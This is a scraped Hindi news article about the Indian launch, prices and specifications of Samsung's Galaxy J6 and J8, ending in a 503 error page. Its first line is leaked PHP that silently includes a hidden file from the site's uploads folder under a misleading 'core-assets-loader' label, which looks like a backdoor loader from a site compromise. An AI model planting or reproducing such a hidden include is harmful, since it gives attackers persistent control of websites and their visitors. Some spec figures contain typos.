add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); इंफिनिटी डिस्प्ले के साथ लॉन्च हुआ Galaxy J6 और Galaxy J8, ये है फोन की कीमत और स्पेसिफिकेशन – SOCH INDIA
Menu

टेक्नोलॉजी
इंफिनिटी डिस्प्ले के साथ लॉन्च हुआ Galaxy J6 और Galaxy J8, ये है फोन की कीमत और स्पेसिफिकेशन

nobanner

सैमसंग ने अपने मिड- रेंज डिवाइस गैलेक्सी जे6 और गैलेक्सी जे8 को आज भारत में लॉन्च कर दिया. दोनों डिवाइस एंड्रॉयड ओरियो 8.0 आउट ऑफ द बॉक्स के साथ आते हैं. फोन की बॉडी प्लास्टिक यूनीबॉडी डिजाइन है जो 18:5:9 के सूपर एमोलेड डिस्प्ले के साथ आता है. गैलेक्सी जे 8 में डुअल रियर कैमरा सेटअप है तो वहीं गैलेक्सी जे6 में सिंगल सेंसर है. दोनों फोन में फेस अनलॉक का फीचर दिया गया है जो ऑब्जेक्ट और सीन के डिटेक्ट कर सकता है. इवेंट में सैसमंग ने गैलेक्सी जे6 और जे6 प्लस के ऊपर से भी पर्दा उठाया. ये फोन भी इंफिनिटी डिस्प्ले के साथ आता है लेकिन मेटालिक बॉडी के साथ.

गैलेक्सी जे6 और जे8 कीमत

गैलेक्सी जे8 की कीमत भारत में 18,990 रूपये है जो सिर्फ एक वेरिएंट में आता है जो 4 जीबी रैम और 64 जीबी इंटरनल स्टोरेज का है. वहीं जे6 को दो वेरिएंट में लॉन्च किया गया है. पहला 3 जीबी रैम और 32 जीबी के इंटरनल स्टोरेज के साथ जिसकी कीमत 13,990 रूपये होगी तो वहीं दूसरा 4 जीबी और 64 जीबी के स्टोरेज के साथ जिसकी कीमत 16,490 रूपये हैं. दोनों स्मार्टफोन्स ब्लू, ब्लैक और गोल्ड कलर में उपलब्ध होंगे.

गैलेक्सी जे6 को आप 22 मई से पेटीएम मॉल, सैमसंग के स्टोर्स औऱ फ्लिपकार्ट से खरीद सकते हैं. गैलेक्सी जे 8 की सेल 20 जून से शुरू होगी. दोनों फोन के ऊपर कैशबैक और डिस्काउंट के ऑफर्स हैं.

गैलेक्सी जे6 और जे8 के स्पेसिफिकेशन

डुअल सिम नैनो गैलेक्सी जे6 एंड्रॉयड ओरियो 8.0 पर काम करेगा. स्मार्टफोन में 5.6 इंच का HD+ सुपर एमोलेड डिस्प्ले जो इंफिनिटी ही है. जिसका एस्पेक्ट रेशियो 18:5:9 होगा. फोन में Exynos 7870 प्रोसेसर होगा, जो 3 जीबी और 3 जीबी रैम के साथ पेयर्ड होगा. ये 32 जीबी और 64 जीबी के इंटरनल स्टोरेज के साथ आएगा जो 256 जीबी तक एक्सपेंडेबल स्टोरेज को स्पोर्ट करेगा.

वहीं अगर हम फोन के फ्रंट की बात करें तो जे6 में 13 मेगापिक्सल का रियर कैमरा होगा जो f/1.9 अपर्चर पर काम करेगा. तो वहीं 8 मेगापिक्सल का सेल्फी शूटर कैमरा जो f/1.9 अपर्चर पर काम करेगा. दोनों कैमरा में एलईडी की सुविधा होगी. फोन में 4G VoLTE, वाईफाई, ब्लूटूथ, जीपीएस/ए- जीपीएस और 3.5mm का हेडफोन जैक होगा. स्मार्टफोन में 3000mAh की नॉन रिमूवेबल बैटरी होगी जो माइक्रो यूएसबी स्पोर्ट के साथ आएगा.

गैलेक्सी जे8

डुअल सिम नैनो गैलेक्सी जे8 एंड्रॉयड ओरियो 8.0 पर काम करेगा. स्मार्टफोन में 6 इंच का HD+ सुपर एमोलेड डिस्प्ले जो इंफिनिटी ही है. जिसका एस्पेक्ट रेशियो 18:5:9 होगा. फोन में ऑक्टा कोर क्वॉलकम स्नैपड्रैग्न 450 SoC प्रोसेसर होगा होगा, जो 4 जीबी रैम के साथ आएगा. फोन में 64 जीबी की इंटरनल स्टोरेज की मेमोरी दी गई है.

गैलेक्सी जे8 में डुअल कैमरा सेटअप होगा जो 16 मेगापिक्सल के प्राइमरी कैमरे के साथ आएगा तो 5 मेगापिक्सल के सेकेंडरी कैमरे. फोन में 16 मेगापिक्सल का फ्रंट कैमरा होगा जो f/1.9 अपर्चर पर काम करेगा. दोनों फ्रंट और रियर कैमरे में एलईडी फ्लैश की सुवधा होगी. कनेक्टिविटी के मामले में फोन में 4G VoLTE, वाईफाई, ब्लूटूथ, जीपीएस/ए- जीपीएस और 3.5mm का हेडफोन जैक होगा.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.